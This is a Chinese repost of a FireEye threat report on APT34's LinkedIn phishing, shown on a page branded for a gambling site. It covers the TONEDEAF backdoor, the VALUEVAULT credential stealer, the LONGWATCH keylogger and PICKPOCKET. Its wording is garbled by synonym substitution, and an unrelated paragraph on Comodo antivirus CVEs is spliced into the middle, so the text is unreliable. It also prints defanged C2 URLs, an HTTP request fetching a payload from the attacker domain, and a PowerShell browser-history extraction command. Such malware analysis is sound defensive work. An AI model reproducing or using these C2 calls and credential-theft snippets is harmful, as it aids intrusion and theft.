APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

申博_安全防护 申博 63次浏览 未收录 0个评论

背景

APT34被认为是一个为伊朗的国家利益效劳的黑客构造,重要侧重于网络间谍运动,最少从2014年最先就一向处于活泼状况。这个构造已普遍地针对各个行业,包含金融、政府、动力、化工和电信,而且重要集合在中东地区。

跟着中东地缘政治紧张局势的加重,伊朗对战略情报的需求也变得愈来愈急切。我们估计,伊朗在将来将大幅增添网络间谍运动的局限和局限,且很可以从政客和中心构造入手来弥补这一空缺。这一点从其歹意软件和基础设施的增长上就可以显著看出。

网络垂纶行动

在2019年6月下旬,FireEye辨认出了一场网络垂纶行动,并将其归于伊朗要挟构造APT34(又称Oilrig、Cobalt Gypsy),该行动有以下三个症结属性:

· 进击者伪装成剑桥大学成员的身份以取得受害者信托;

· 运用LinkedIn通报歹意文档;

· 有三类之前未在APT34的武器库中发明的歹意软件。

且本次行动重要针对以下行业:动力和公用事业;政府;油气。

开端剖析

2019年6月19日,FireEye Endpoint Security装备上收到了破绽检测警报。违规应用顺序被辨认为Microsoft Excel,并由FireEye Endpoint Security的ExploitGuard引擎马上中断。 ExploitGuard具有行动监控,检测和防备功用,可监控应用顺序行动,查找要挟行动者用来损坏传统检测机制的种种异常情况。随后可以对违规应用顺序举行沙盒化或停止,防备破绽应用进入下一个编程步骤。

Managed Defense SOC剖析了警报,并辨认出位于C:\ Users \ <user_name> \.templates中的名为System.doc(MD5:b338baa673ac007d7af54075ea69660b)的歹意文件。文件System.doc的本质上是Windows可移植可实行文件(PE)。FireEye将这类新歹意软件肯定为TONEDEAF。

TONEDEAF是一个后门,运用HTTP GET和POST要求与单个C2效劳器通讯,支撑网络体系信息、上传和下载文件以及恣意shell敕令实行。实行时,TONEDEAF将加密数据写入两个临时文件temp.txt和temp2.txt,这两个文件在实行时位于同一个目次中。我们将在本文附录中讨论TONEDEAF的其他技术细节。

回溯到进击检测之前的步骤,FireEye发明System.doc被一个名为ERFT-Details.xls的文件植入,并找到了ERFT-Details.xls文件的链接:http://www.cam-research-ac [.] com / Documents / ERFT-Details.xls。网络证据显现在该表格下载之前受害者还访问了LinkedIn的音讯。与受害者联络后我们得知,文件确实是是经由过程LinkedIn音讯收到的,进击者伪装成“剑桥大学研究职员”的应聘者“Rebecca Watts”。图1显现了Watts密斯的求职留言。

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

图1:链接现实引导向TONEDEAF

这不是我们第一次看到APT34在各种行动中伪装成学术职员求职的模样,对话一般发生在交际媒体平台上,假如目标构造将重点放在电子邮件防备上,那末交际媒体平台可以就是一种有用的通报机制。

FireEye搜检了原始文件ERFT-Details.xls,该文件最少有两个唯一的MD5文件哈希值:

· 96feed478c347d4b95a8224de26a1b2c

· caf418cbf6a9c4e93e79d4714d5d3b87

文件是base64编码的,翻开后会在目标目次中建立System.doc,用于建立的VBA代码片段如图2所示。

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

图2:System.doc中的VBA代码片段

此Excel文档还会建立一个名为“windows update check”的计划任务,每分钟运转文件C:\Users\<user_name>\.templates\System Manager.exe一次,末了的VBA函数会将System.doc重命名为System Manager.exe。建立计划任务、隐约处置惩罚以防止简朴检测的VBA代码片段如图3所示。

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

图3:System.doc中的其他VBA代码

初次实行TONEDEAF时,FireEye经由过程端口80肯定了对C2效劳器offlineearthquake [.] com的回调。

进一步发掘

Comodo杀毒软件爆多个漏洞

Comodo是一家位于美国的软件公司,总部设在新泽西州泽西城,成立于1998年,是世界著名的IT安全服务提供商和SSL证书的供应商之一。 研究人员在Comodo Antivirus / Comodo Antivirus Advanced等产品中发现多个漏洞,CVE编号为CVE-2019-3969、CVE-2019-3970、CVE-2019-3971、CVE-2019-3972、CVE-2019-3973。除CVE-2019-3973只影响11.0.0.6582及低版本外,其他漏洞都影响至12.0.0.6810版本。 CVE-2019-3969:  CmdAgent.exe本地权限提升漏洞 CmdAgent.exe验证来自Cmdagent.exe的请求接口的COM客户端使用的是签名的二进制文件。攻击者可以通过修改PEB(Process Environment Block)中客户端的进程

在肯定offlineearthquake [.] com作为潜伏C2域后,FireEye在可见局限内举行了更普遍的搜刮,并发明了别的两个在该域上的歹意软件,离别名为VALUEVAULT和LONGWATCH,还肯定了PICKPOCKET(一种浏览器凭证偷窃东西)的一种变体。

对offlineéarthquake[.] com的要求可以采用多种形式,详细取决于歹意软件的装置和目标。另外,在装置过程当中,歹意软件会检索体系和当前用户名,这些用户名用于建立三个字符的“sys_id”。此值用于后续要求,可以会跟踪受感染的目标运动。网址的构造以下:

· hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000

· hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000

· hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000

· hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

在C2上辨认的第一个可实行文件是WinNTProgram.exe(MD5:021a0f57fe09116a43c27e5133a57a0a),FireEye标识为LONGWATCH。 LONGWATCH是一个键盘记录器,可以将键盘记录输出到Window的临时文件夹中的log.txt文件。 有关LONGWATCH的更多信息,请参阅帖子末端的歹意软件附录部份。

检索VALUEVAULT的HTTP流量片段以下所示:

GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1
FireEye将b.exe(MD5:9fff498b78d9498b33e08b892148135f)标识为VALUEVAULT。

VALUEVAULT是来自Massimiliano Montoro的”Windows Vault Password Dumper”浏览器凭证盗取东西的Golang版本,许可操纵职员提取和检察存储在Windows Vault中的凭证,另外VALUEVAULT将挪用Windows PowerShell来提取浏览器历史记录,以便将浏览器暗码与访问过的站点婚配。有关VALUEVAULT的更多信息,请拜见下面的附录。

别的两个附加文件离别是PE86.dll(MD5:d8abe843db508048b4d4db748f92a103)和PE64.dll(MD5:6eca9c2b7cf12c247032aae28419319e),它们离别是歹意软件PICKPOCKET的64位和32位变体。

PICKPOCKET是一种凭证盗取东西,可将用户的网站登录凭证从Chrome,Firefox和Internet Explorer转储到文件中。此东西之前曾在2018年的Mandiant事宜相应中观察到,迄今为止仅由APT34运用。

结论

我们有理由置信APT34在将来的要挟行动中还会运用到更多事情,发起相干构造在防备上能下足工夫,保持警惕。

歹意软件附录

TONEDEAF

TONEDEAF是一个后门,运用HTTP或DNS与敕令和掌握效劳器通讯。支撑的敕令包含体系信息网络、文件上传、文件下载和恣意shell敕令实行。只管此后门被编码为可以与硬编码的C2效劳器 c[.]cdn-edge-akamai[.]com的DNS要求举行通讯,但现在还未设置此功用的运用。图5展现了dns_exfil的顺序集CALL指令的片段。建立者可以将此作为作为Plan B,用于将来DNS渗入的一种手腕。

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

图4:TONEDEAF二进制代码片段

除了未在此样本中启用外,DNS隧道功用另有缺失值的毛病,使之不能准确实行,比方个中一个毛病就在没有斟酌Unicode字符串的情况下肯定了敕令相应字符串的长度。因而当歹意软件实行返回Unicode输出的shell敕令时,会发送单个敕令相应字节。

VALUEVAULT

VALUEVAULT是Golang版的浏览器凭证盗取东西,其挪用Windows PowerShell来提取浏览器历史记录的函数部份片段以下所示:

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

实行时,VALUEVAULT在AppData \ Roaming目次下的实行帐户的高低文中建立一个SQLITE数据库文件,名为fsociety.dat,VALUEVAULT将以SQL花样将转储的暗码写入此文件。图7显现了fsociety.dat文件的SQL花样。

APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件

图5:VALUEVAULT fsociety.dat SQLite数据库的SQL花样

VALUEVAULT的函数名没有殽杂,在字符串剖析中可以直接检察。其他开发职员环境变量可以直接在二进制文件中运用,以下所示。VALUEVAULT不具备实行网络通讯的才能,这意味着操纵职员须要手动检索东西捕捉的输出。

实行VALUEVAULT时提取的Golang文件以下:

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/mozila.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/main.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/ie.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

LONGWATCH

LONGWATCH是域offlineearthquake[.]com上的二进制文件WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a)。它的重要功用是键盘记录顺序,能把键盘记录输出到到Windows temp文件夹中的log.txt文件中。

标识的一些键以下:

GetAsyncKeyState
>---------------------------------------------------\n\n
c:\\windows\\temp\\log.txt
[ENTER]
[CapsLock]
[CRTL]
[PAGE_UP]
[PAGE_DOWN]
[HOME]
[LEFT]
[RIGHT]
[DOWN]
[PRINT]
[PRINT SCREEN] (1 space)
[INSERT]
[SLEEP]
[PAUSE]
\n---------------CLIPBOARD------------\n
\n\n >>>  (2 spaces)
c:\\windows\\temp\\log.txt

原文地点: https://www.4hou.com/web/19359.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明APT34应用LinkedIn垂纶,其武器库中再添三类歹意软件
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址